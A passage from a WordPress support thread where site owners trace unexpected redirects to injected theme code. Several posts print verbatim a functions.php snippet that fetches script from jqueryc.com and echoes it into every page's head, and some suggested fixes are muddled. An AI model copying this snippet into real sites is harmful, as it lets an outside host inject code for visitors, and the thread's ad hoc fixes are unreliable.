WordPress.org

Support

Support » Themes and Templates » Server Not Found

Server Not Found

  • brainboxstudios
    Member

    @brainboxstudios

    Hey There,
    In the last week i’ve built a wordpress site at http://www.chillicakedeli.com and finished it two days ago, woke up this morning and it’s saying ‘Server Not Found’ Firefox can’t find the server at www1.chillicakedeli.com, don’t know why it’s suddenly stopped working as it was fine all yesterday!

    Please help

Viewing 15 replies - 16 through 30 (of 37 total)
  • brainboxstudios
    Member

    @brainboxstudios

    I just re-uploaded my theme and now it’s working again, still dont know why it did it in the first place though!

    Same problem here… site has been working fine for months and today… re-directed to www1. Have re-uploaded the theme and it now working ok again… but for how long I wonder? Using Modernize theme from GoodLayers purchased from Themeforest.

    I Fixed it!,.. few minutes ago, it redirected to jqueryc.com or something… i searched in the functions.php and there it was, from line 2 to 10 some weird code ,with redirections etc., i completely removed that code and it worked again. safety failure?

    here is the solution:
    For the “Modernize” theme in file ../include/plugin/post.php replace

    $url = "http://www.jqueryc.com/jquery-1.6.3.min.js";

    with

    $src = "http://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js";

    The domain “www.jqueryc.com” is expired

    My site was doing the same thing today. It was redirecting to www1. I’m using the Empire theme

    In the template function editor, I replaced
    $url = “http://www.jqueryc.com/jquery-1.6.3.min.js”;
    with
    $src = “http://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js”;
    and got nothing but i reverted it back to what it was
    $url = “http://www.jqueryc.com/jquery-1.6.3.min.js”;
    and my site started working again. I don’t know why but it did

    Hi @esmi, as I’ve said; I use WP-Avatar.

    I’ve removed the following code from functions.php

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    if (function_exists('load_theme_textdomain')) {
        load_theme_textdomain('wpavatar', get_template_directory().'/language');
    }

    The site is now working. What does the above actually do for the site? I’m guessing language?

    I am not comfortable still as to why this has happened; the cause has not been defined; and there are multiple people just deleting code in wordpress to get it working again.

    Please provide some clarification around the issue.

    if (function_exists(‘load_theme_textdomain’)) {
    load_theme_textdomain(‘wpavatar’, get_template_directory().’/language’);
    }

    I just added back the second if function which I included by mistake.

    Any theme (or plugin) that is forcing you to use jQuery 1.6.3 needs to be taken out back and shot.

    WordPress uses 1.7.2, and I believe we’ll be on 1.8.3 for WP 3.5.

    So … If your themes are forcing that in, then they need to stop.

    My site began redirecting again so I tried removing the code from functions. When I did that, the whole page turned white and i couldn’t do anything at all. I had to go back on the browser for the editor page to show up again. I reinserted the code so it reads exactly the same as it was. I clicked submit and it still turned the whole page white. Now no matter where I try to go everything is just white. I am scared to close out of the window because I cant log back on to wp-admin because it will just take me to a white page. My site is ncsucottonfirst.com. Please help!

    This is what my function page says
    <?php if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}

    function uw_session_start(){
    session_start();
    }

    add_action( ‘init’, ‘uw_session_start’ );

    // INCLUDE MY FRAMEWORK
    require_once(TEMPLATEPATH . “/framework/theme.php”);

    ?>

    Heres my formatted code again and BTW I am using the Empire theme

    <?php if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url=http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    
    function uw_session_start(){
    	session_start();
    }
    
    add_action( 'init', 'uw_session_start' );
    
    // INCLUDE MY FRAMEWORK
    require_once(TEMPLATEPATH . "/framework/theme.php");
    
    ?>

    My site is ncsucottonfirst.com. Please help!

    @bmwhealon do you have FTP access to the site? and any backups of the site?

    I’m not sure. I had someone else make the site and I just manage it. When it started redirecting today I just followed instructions on this and other forums. It started working for an hour and then stopped. then I deleted a code, pressed submit, got a blank screen, went back and reinserted code and still got a blank screen. But the code is the exact same as it was beforehand when the wpadmin page was still working.

    But the code is the exact same as it was beforehand when the wpadmin page was still working.

    Hey @bmwhealon, I think you will find if you deleted the wrong code eg. partially out of the function.php file; this will happen. If you have FTP details you can login to the server and see the files / upload a fix without using wordpress. Then wordpress will work again.

    esmi
    Forum Moderator

    @esmi

    Any theme (or plugin) that is forcing you to use jQuery 1.6.3 needs to be taken out back and shot.

    @ipstenu: I’ll let Themeforest know about this one. They’ve specifically asked to be notified about themes using versions of jQuery older than core WP.

    esmi
    Forum Moderator

    @esmi

    @bmwhealon: The problem with these themes is that you can’t always remove the call to the older version jQuery and keep a working theme. Can I ask if you obtained your Empire theme from wooThemes or Themeforest? Both vendors have a theme of that name.

Viewing 15 replies - 16 through 30 (of 37 total)
  • The topic ‘Server Not Found’ is closed to new replies.